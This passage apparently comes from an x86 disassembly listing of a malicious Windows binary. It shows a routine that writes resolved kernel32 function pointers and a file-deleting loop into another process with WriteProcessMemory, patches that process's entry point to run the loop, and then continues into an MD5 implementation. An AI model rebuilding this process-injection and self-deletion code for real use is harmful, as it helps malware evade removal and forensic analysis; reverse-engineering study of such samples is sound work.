mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_498459
lea eax, [ebp+var_220]
push eax
call ds:dword_4A2980
test eax, eax
jnz short loc_49844B
push 1F4h
call ds:dword_4A2998
lea eax, [ebp+var_220]
push eax
call ds:dword_4A2980
test eax, eax
jnz short loc_49844B
jmp short loc_498478
; ---------------------------------------------------------------------------
loc_49844B: ; CODE XREF: sub_498333+F8�j
; sub_498333+114�j
push [ebp+var_10C]
call ds:dword_4A2984
jmp short loc_4983FB
; ---------------------------------------------------------------------------
loc_498459: ; CODE XREF: sub_498333+E7�j
; sub_498333:loc_498478�j
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_49846E
push [ebp+var_10C]
call ds:dword_4A2984
loc_49846E: ; CODE XREF: sub_498333+12D�j
push 0
call ds:dword_4A2990
jmp short loc_49847A
; ---------------------------------------------------------------------------
loc_498478: ; CODE XREF: sub_498333+116�j
jmp short loc_498459
; ---------------------------------------------------------------------------
loc_49847A: ; CODE XREF: sub_498333+143�j
pop edi
leave
retn
sub_498333 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49847D proc near ; DATA XREF: sub_498494+2B6�o
push ebp
mov ebp, esp
pop ebp
retn
sub_49847D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_498482 proc near ; DATA XREF: sub_498494+2EF�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, offset sub_498333
call eax ; sub_498333
pop edi
pop esi
pop ebx
pop ebp
retn
sub_498482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_498494 proc near ; CODE XREF: sub_4981C3+107�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push 0
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_20], ecx
mov eax, [ebp+arg_4]
mov ds:dword_4A2920, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2920
push offset dword_4A2920
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
push 20h
pop ecx
xor eax, eax
mov edi, offset dword_4A29A0
rep stosd
call ds:dword_4A26E8 ; GetCurrentProcessId
push eax
push offset aMbx@X@_ ; "MBX@%X@*.###"
push offset dword_4A29A0
call ds:dword_4A27D4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push 80h
push offset dword_4A29A0
push offset dword_4A29A0
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
mov esi, offset aKernel32_dll ; "kernel32.dll"
lea edi, [ebp+var_10]
movsd
movsd
movsd
movsb
lea eax, [ebp+var_10]
push eax
push offset aGettemppatha ; "GetTempPathA"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2970, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2970
push offset dword_4A2970
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSetcurrentdire ; "SetCurrentDirectoryA"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2974, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2974
push offset dword_4A2974
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetcurrentdire ; "GetCurrentDirectoryA"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2978, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2978
push offset dword_4A2978
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindfirstfilea ; "FindFirstFileA"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A297C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A297C
push offset dword_4A297C
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aDeletefilea ; "DeleteFileA"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2980, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2980
push offset dword_4A2980
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindclose ; "FindClose"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2984, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2984
push offset dword_4A2984
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2988, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2988
push offset dword_4A2988
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aWaitforsingleo ; "WaitForSingleObject"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A298C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A298C
push offset dword_4A298C
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aExitprocess ; "ExitProcess"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2990, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2990
push offset dword_4A2990
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aOpenprocess ; "OpenProcess"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2994, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2994
push offset dword_4A2994
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSleep ; "Sleep"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A2998, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A2998
push offset dword_4A2998
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aClosehandle ; "CloseHandle"
call sub_49AD79
pop ecx
pop ecx
mov ds:dword_4A299C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4A299C
push offset dword_4A299C
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
mov eax, offset sub_49847D
sub eax, offset sub_498333
mov [ebp+var_1C], eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_1C]
push offset sub_498333
push offset sub_498333
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
mov eax, [ebp+var_20]
mov ecx, [ebp+var_24]
add ecx, [eax+28h]
mov [ebp+var_18], ecx
lea eax, [ebp+var_14]
push eax
push 20h
push offset sub_498482
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_49F028 ; WriteProcessMemory
pop edi
pop esi
leave
retn
sub_498494 endp
; =============== S U B R O U T I N E =======================================
sub_498798 proc near ; CODE XREF: _4:0048FECC�p
; sub_494610+209�p
push esi
mov esi, ecx
call sub_4989B1
mov eax, esi
pop esi
retn
sub_498798 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4987A4 proc near ; CODE XREF: sub_494610+21D�p
; sub_49885D+112�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, ecx
cmp byte ptr [ebx+68h], 0
jnz loc_498858
mov edx, [ebx+10h]
mov ecx, [ebp+arg_4]
push esi
mov eax, edx
mov esi, ecx
lea edx, [edx+ecx*8]
shr eax, 3
shl esi, 3
and eax, 3Fh
cmp edx, esi
push edi
mov [ebx+10h], edx
jnb short loc_4987D7
inc dword ptr [ebx+14h]
loc_4987D7: ; CODE XREF: sub_4987A4+2E�j
mov edx, ecx
push 40h
shr edx, 1Dh
add [ebx+14h], edx
pop edx
sub edx, eax
cmp ecx, edx
mov [ebp+var_4], edx
jb short loc_49883B
mov esi, [ebp+arg_0]
mov ecx, edx
lea edi, [eax+ebx+18h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
lea eax, [ebx+18h]
and ecx, 3
push eax
rep movsb
mov ecx, ebx
call sub_4989D8
mov esi, [ebp+var_4]
lea eax, [esi+3Fh]
cmp eax, [ebp+arg_4]
jnb short loc_498834
mov edi, eax
loc_49881A: ; CODE XREF: sub_4987A4+8E�j
mov eax, [ebp+arg_0]
mov ecx, ebx
lea eax, [eax+edi-3Fh]
push eax
call sub_4989D8
add edi, 40h
add esi, 40h
cmp edi, [ebp+arg_4]
jb short loc_49881A
loc_498834: ; CODE XREF: sub_4987A4+72�j
mov ecx, [ebp+arg_4]
xor eax, eax
jmp short loc_49883D
; ---------------------------------------------------------------------------
loc_49883B: ; CODE XREF: sub_4987A4+45�j
xor esi, esi
loc_49883D: ; CODE XREF: sub_4987A4+95�j
mov edx, [ebp+arg_0]
sub ecx, esi
lea edi, [eax+ebx+18h]
mov eax, ecx
add esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
loc_498858: ; CODE XREF: sub_4987A4+B�j
pop ebx
leave
retn 8
sub_4987A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49885D proc near ; CODE XREF: sub_494610+22F�p
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
mov esi, ecx
xor ebx, ebx
push edi
mov [ebp+var_4], esi
cmp [esi+68h], bl
mov [ebp+var_4C], 80h
mov [ebp+var_4B], bl
mov [ebp+var_4A], bl
mov [ebp+var_49], bl
mov [ebp+var_48], bl
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], bl
mov [ebp+var_44], bl
mov [ebp+var_43], bl
mov [ebp+var_42], bl
mov [ebp+var_41], bl
mov [ebp+var_40], bl
mov [ebp+var_3F], bl
mov [ebp+var_3E], bl
mov [ebp+var_3D], bl
mov [ebp+var_3C], bl
mov [ebp+var_3B], bl
mov [ebp+var_3A], bl
mov [ebp+var_39], bl
mov [ebp+var_38], bl
mov [ebp+var_37], bl
mov [ebp+var_36], bl
mov [ebp+var_35], bl
mov [ebp+var_34], bl
mov [ebp+var_33], bl
mov [ebp+var_32], bl
mov [ebp+var_31], bl
mov [ebp+var_30], bl
mov [ebp+var_2F], bl
mov [ebp+var_2E], bl
mov [ebp+var_2D], bl
mov [ebp+var_2C], bl
mov [ebp+var_2B], bl
mov [ebp+var_2A], bl
mov [ebp+var_29], bl
mov [ebp+var_28], bl
mov [ebp+var_27], bl
mov [ebp+var_26], bl
mov [ebp+var_25], bl
mov [ebp+var_24], bl
mov [ebp+var_23], bl
mov [ebp+var_22], bl
mov [ebp+var_21], bl
mov [ebp+var_20], bl
mov [ebp+var_1F], bl
mov [ebp+var_1E], bl
mov [ebp+var_1D], bl
mov [ebp+var_1C], bl
mov [ebp+var_1B], bl
mov [ebp+var_1A], bl
mov [ebp+var_19], bl
mov [ebp+var_18], bl
mov [ebp+var_17], bl
mov [ebp+var_16], bl
mov [ebp+var_15], bl
mov [ebp+var_14], bl
mov [ebp+var_13], bl
mov [ebp+var_12], bl
mov [ebp+var_11], bl
mov [ebp+var_10], bl
mov [ebp+var_F], bl
mov [ebp+var_E], bl
mov [ebp+var_D], bl
jz short loc_498943
mov edi, [ebp+arg_0]
cmp edi, ebx
jz short loc_4989AA
add esi, 58h
movsd
movsd
movsd
movsd
jmp short loc_4989AA
; ---------------------------------------------------------------------------
loc_498943: ; CODE XREF: sub_49885D+D4�j
lea edi, [esi+10h]
push 8
lea eax, [ebp+var_C]
push edi
push eax
mov ecx, esi
call sub_4992B3
mov eax, [edi]
push 38h
shr eax, 3
and eax, 3Fh
pop ecx
cmp eax, ecx
jb short loc_498966
push 78h
pop ecx
loc_498966: ; CODE XREF: sub_49885D+104�j
sub ecx, eax
lea eax, [ebp+var_4C]
push ecx
push eax
mov ecx, esi
call sub_4987A4
lea eax, [ebp+var_C]
push 8
push eax
mov ecx, esi
call sub_4987A4
lea edi, [esi+58h]
push 10h
push esi
push edi
mov ecx, esi
call sub_4992B3
cmp [ebp+arg_0], ebx
jz short loc_4989A0
mov esi, edi
mov edi, [ebp+arg_0]
movsd
movsd
movsd
movsd
mov esi, [ebp+var_4]
loc_4989A0: ; CODE XREF: sub_49885D+135�j
xor eax, eax
lea edi, [esi+18h]
stosb
mov byte ptr [esi+68h], 1
loc_4989AA: ; CODE XREF: sub_49885D+DB�j
; sub_49885D+E4�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_49885D endp
; =============== S U B R O U T I N E =======================================
sub_4989B1 proc near ; CODE XREF: sub_498798+3�p
xor eax, eax
mov dword ptr [ecx], 67452301h
mov [ecx+68h], al
mov [ecx+10h], eax
mov [ecx+14h], eax
mov dword ptr [ecx+4], 0EFCDAB89h
mov dword ptr [ecx+8], 98BADCFEh
mov dword ptr [ecx+0Ch], 10325476h
retn
sub_4989B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4989D8 proc near ; CODE XREF: sub_4987A4+64�p
; sub_4987A4+80�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
mov esi, ecx
push edi
push 40h
mov eax, [esi]
push [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov [ebp+var_8], eax
mov eax, [esi+8]
mov [ebp+var_C], eax
mov eax, [esi+0Ch]
mov [ebp+var_10], eax
lea eax, [ebp+var_50]
push eax
call sub_4992FA
mov edi, [ebp+var_8]
mov ebx, [ebp+var_C]
mov eax, edi
mov ecx, ebx
not eax
and eax, [ebp+var_10]
and ecx, edi
mov edx, edi
or eax, ecx
mov ecx, [ebp+var_4]
add eax, [ebp+var_50]
lea ecx, [ecx+eax-28955B88h]
mov eax, ecx
shr eax, 19h
shl ecx, 7
or eax, ecx
add eax, edi
mov ecx, eax
and edx, eax
not ecx
and ecx, ebx
or ecx, edx
mov edx, [ebp+var_10]
add ecx, [ebp+var_4C]
lea edx, [edx+ecx-173848AAh]
mov ecx, edx
shr ecx, 14h
shl edx, 0Ch
or ecx, edx
add ecx, eax
mov edx, ecx
not edx
and edx, edi
mov edi, ecx
and edi, eax
or edx, edi
add edx, [ebp+var_48]
lea edx, [ebx+edx+242070DBh]
mov ebx, ecx
mov edi, edx
shr edi, 0Fh
shl edx, 11h
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_C], edi
or edx, ebx
mov ebx, [ebp+var_8]
add edx, [ebp+var_44]
lea ebx, [ebx+edx-3E423112h]
mov edx, ebx
shl edx, 16h
shr ebx, 0Ah
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_40]
lea eax, [eax+ebx-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, edx
add edi, edx
mov [ebp+var_4], edi
and eax, [ebp+var_4]
not edi
and edi, [ebp+var_C]
or edi, eax
add edi, [ebp+var_3C]
lea ecx, [ecx+edi+4787C62Ah]
mov eax, ecx
shr eax, 14h
shl ecx, 0Ch
or eax, ecx
add eax, [ebp+var_4]
mov ecx, eax
mov edi, eax
and edi, [ebp+var_4]
mov ebx, eax
not ecx
and ecx, edx
or ecx, edi
mov edi, [ebp+var_C]
add ecx, [ebp+var_38]
lea edi, [edi+ecx-57CFB9EDh]
mov ecx, edi
shr ecx, 0Fh
shl edi, 11h
or ecx, edi
add ecx, eax
mov edi, ecx
and ebx, ecx
not edi
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_34]
lea edx, [edx+edi-2B96AFFh]
mov edi, edx
shl edi, 16h
shr edx, 0Ah
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_8], edi
or edx, ebx
mov ebx, [ebp+var_4]
add edx, [ebp+var_30]
lea ebx, [ebx+edx+698098D8h]
mov edx, ebx
shr edx, 19h
shl ebx, 7
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_2C]
lea eax, [eax+ebx-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
add edi, edx
mov eax, edi
mov ebx, edi
not eax
and eax, [ebp+var_8]
and ebx, edx
or eax, ebx
add eax, [ebp+var_28]
lea ecx, [ecx+eax-0A44Fh]
mov ebx, ecx
shr ebx, 0Fh
shl ecx, 11h
or ebx, ecx
mov ecx, edi
add ebx, edi
mov eax, ebx
and ecx, ebx
not eax
and eax, edx
mov [ebp+var_C], ebx
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_24]
lea ecx, [ecx+eax-76A32842h]
mov eax, ecx
shl eax, 16h
shr ecx, 0Ah
or eax, ecx
add eax, ebx
mov ecx, eax
and ebx, eax
not ecx
and ecx, edi
or ecx, ebx
add ecx, [ebp+var_20]
lea edx, [edx+ecx+6B901122h]
mov ecx, edx
shr ecx, 19h
shl edx, 7
or ecx, edx
mov edx, eax
add ecx, eax
mov [ebp+var_4], ecx
and edx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or ecx, edx
add ecx, [ebp+var_1C]
lea edi, [edi+ecx-2678E6Dh]
mov ecx, edi
shr ecx, 14h
shl edi, 0Ch
or ecx, edi
add ecx, [ebp+var_4]
mov [ebp+arg_0], ecx
mov edi, ecx
not [ebp+arg_0]
mov edx, [ebp+arg_0]
and edi, [ebp+var_4]
and edx, eax
mov ebx, ecx
or edx, edi
mov edi, [ebp+var_C]
add edx, [ebp+var_18]
lea edi, [edi+edx-5986BC72h]
mov edx, edi
shr edx, 0Fh
shl edi, 11h
or edx, edi
add edx, ecx
mov [ebp+var_10], edx
and ebx, edx
not [ebp+var_10]
mov edi, [ebp+var_10]
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_14]
lea eax, [eax+edi+49B40821h]
mov edi, eax
shl edi, 16h
shr eax, 0Ah
or edi, eax
mov eax, [ebp+arg_0]
add edi, edx
and eax, edx
and ebx, edi
or eax, ebx
mov ebx, [ebp+var_4]
add eax, [ebp+var_4C]
lea eax, [ebx+eax-9E1DA9Eh]
mov ebx, eax
shr ebx, 1Bh
shl eax, 5
or ebx, eax
mov eax, [ebp+var_10]
and eax, edi
add ebx, edi
mov [ebp+arg_0], eax
mov eax, edx
and eax, ebx
mov [ebp+var_4], ebx
mov ebx, eax
mov eax, [ebp+arg_0]
or eax, ebx
add eax, [ebp+var_38]
lea ecx, [ecx+eax-3FBF4CC0h]
mov eax, ecx
shr eax, 17h
shl ecx, 9
or eax, ecx
mov ecx, edi
add eax, [ebp+var_4]
not ecx
and ecx, [ebp+var_4]
mov ebx, eax
and ebx, edi
or ecx, ebx
add ecx, [ebp+var_24]
lea edx, [edx+ecx+265E5A51h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, [ebp+var_4]
add ecx, eax
mov [ebp+var_C], ecx
and ecx, [ebp+var_4]
not edx
and edx, eax
mov ebx, [ebp+var_C]
or edx, ecx
add edx, [ebp+var_50]
lea edi, [edi+edx-16493856h]
mov edx, eax
mov ecx, edi
shl ecx, 14h
shr edi, 0Ch
or ecx, edi
mov edi, eax
add ecx, ebx
not edx
and edx, ebx
and edi, ecx
or edx, edi
mov edi, [ebp+var_4]
add edx, [ebp+var_3C]
lea edx, [edi+edx-29D0EFA3h]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, ebx
add edi, ecx
mov [ebp+var_4], edi
mov edi, ebx
and edi, [ebp+var_4]
not edx
and edx, ecx
or edx, edi
add edx, [ebp+var_28]
lea eax, [eax+edx+2441453h]
mov edx, eax
shr edx, 17h
shl eax, 9
or edx, eax
mov eax, ecx
add edx, [ebp+var_4]
not eax
and eax, [ebp+var_4]
mov edi, edx
and edi, ecx
or eax, edi
add eax, [ebp+var_14]
lea edi, [ebx+eax-275E197Fh]
mov eax, edi
shr eax, 12h
shl edi, 0Eh
or eax, edi
mov edi, [ebp+var_4]
add eax, edx
mov ebx, eax
and ebx, [ebp+var_4]
not edi
and edi, edx
or edi, ebx
mov ebx, edx
add edi, [ebp+var_40]
lea ecx, [ecx+edi-182C0438h]
mov edi, ecx
shl edi, 14h
shr ecx, 0Ch
or edi, ecx
mov ecx, edx
add edi, eax
not ecx
and ecx, eax
and ebx, edi
or ecx, ebx
mov ebx, [ebp+var_4]
add ecx, [ebp+var_2C]
mov [ebp+var_8], edi
lea ebx, [ebx+ecx+21E1CDE6h]
mov ecx, ebx
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
mov ebx, eax
not ebx
add ecx, edi
and ebx, edi
mov edi, eax
and edi, ecx
or ebx, edi
add ebx, [ebp+var_18]
lea edx, [edx+ebx-3CC8F82Ah]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
mov edx, [ebp+var_8]
add edi, ecx
mov ebx, edi
and ebx, [ebp+var_8]
not edx
and edx, ecx
or edx, ebx
add edx, [ebp+var_44]
lea eax, [eax+edx-0B2AF279h]
mov edx, eax
shr edx, 12h
shl eax, 0Eh
or edx, eax
mov eax, ecx
add edx, edi
not eax
mov ebx, edx
and eax, edi
and ebx, ecx
or eax, ebx
mov ebx, [ebp+var_8]
add eax, [ebp+var_30]
lea eax, [ebx+eax+455A14EDh]
mov ebx, eax
shl ebx, 14h
shr eax, 0Ch
or ebx, eax
mov eax, edi
add ebx, edx
mov [ebp+var_8], ebx
not eax
mov ebx, edi
and eax, edx
and ebx, [ebp+var_8]
or eax, ebx
add eax, [ebp+var_1C]
lea ecx, [ecx+eax-561C16FBh]
mov eax, ecx
shr eax, 1Bh
shl ecx, 5
or eax, ecx
mov ecx, edx
add eax, [ebp+var_8]
mov [ebp+var_4], eax
and ecx, [ebp+var_4]
mov eax, edx
mov ebx, [ebp+var_4]
not eax
and eax, [ebp+var_8]
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_48]
not ecx
and ecx, ebx
lea edi, [edi+eax-3105C08h]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, ebx
mov edi, eax
and edi, [ebp+var_8]
or ecx, edi
add ecx, [ebp+var_34]
lea edx, [edx+ecx+676F02D9h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, ebx
add ecx, eax
not edx
mov edi, ecx
and edx, eax
and edi, ebx
or edx, edi
mov edi, [ebp+var_8]
add edx, [ebp+var_20]
lea edi, [edi+edx-72D5B376h]
mov edx, edi
shl edx, 14h
shr edi, 0Ch
or edx, edi
mov edi, eax
add edx, ecx
xor edi, ecx
xor edi, edx
add edi, [ebp+var_3C]
lea ebx, [ebx+edi-5C6BEh]
mov edi, ebx
shr edi, 1Ch
shl ebx, 4
or edi, ebx
mov ebx, ecx
add edi, edx
xor ebx, edx
xor ebx, edi
add ebx, [ebp+var_30]
lea eax, [eax+ebx-788E097Fh]
mov ebx, eax
shr ebx, 15h
shl eax, 0Bh
or ebx, eax
add ebx, edi
mov eax, ebx
xor eax, edx
xor eax, edi
add eax, [ebp+var_24]
lea ecx, [ecx+eax+6D9D6122h]
mov eax, ecx
shr eax, 10h
shl ecx, 10h
or eax, ecx
mov ecx, ebx
add eax, ebx
xor ecx, eax
mov [ebp+var_C], eax
mov eax, ecx
xor eax, edi
add eax, [ebp+var_18]
lea edx, [edx+eax-21AC7F4h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
add eax, [ebp+var_C]
xor ecx, eax
add ecx, [ebp+var_4C]
lea edi, [edi+ecx-5B4115BCh]
mov ecx, edi
shr ecx, 1Ch
shl edi, 4
or ecx, edi
mov edi, [ebp+var_C]
mov edx, edi
add ecx, eax
xor edx, eax
xor edx, ecx
add edx, [ebp+var_40]
lea ebx, [ebx+edx+4BDECFA9h]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
mov [ebp+arg_0], edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_34]
lea ebx, [edi+ebx-944B4A0h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, edx
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, ecx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx-41404390h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [ecx+ebx+289B7EC6h]
mov ecx, ebx
shr ecx, 1Ch
shl ebx, 4
or ecx, ebx
mov ebx, edi
add ecx, eax
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_50]
lea edx, [edx+ebx-155ED806h]
mov ebx, edx
shr ebx, 15h
shl edx, 0Bh
or ebx, edx
add ebx, ecx
mov edx, ebx
xor edx, eax
xor edx, ecx
add edx, [ebp+var_44]
lea edx, [edi+edx-2B10CF7Bh]
mov edi, edx
shr edi, 10h
shl edx, 10h
or edi, edx
mov [ebp+arg_0], ebx
add edi, ebx
xor [ebp+arg_0], edi
mov edx, [ebp+arg_0]
xor edx, ecx
add edx, [ebp+var_38]
lea edx, [eax+edx+4881D05h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea edx, [ecx+edx-262B2FC7h]
mov ecx, edx
shr ecx, 1Ch
shl edx, 4
or ecx, edx
mov edx, edi
xor edx, eax
add ecx, eax
xor edx, ecx
add edx, [ebp+var_20]
lea ebx, [ebx+edx-1924661Bh]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_14]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, edx
add edi, edx
xor ebx, edi
xor ebx, ecx
add ebx, [ebp+var_48]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, edx
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_50]
lea eax, [ecx+eax-0BD6DDBCh]
mov ecx, eax
shr ecx, 1Ah
shl eax, 6
or ecx, eax
mov eax, edi
add ecx, ebx
not eax
or eax, ecx
xor eax, ebx
add eax, [ebp+var_34]
lea eax, [edx+eax+432AFF97h]
mov edx, eax
shr edx, 16h
shl eax, 0Ah
or edx, eax
mov eax, ebx
add edx, ecx
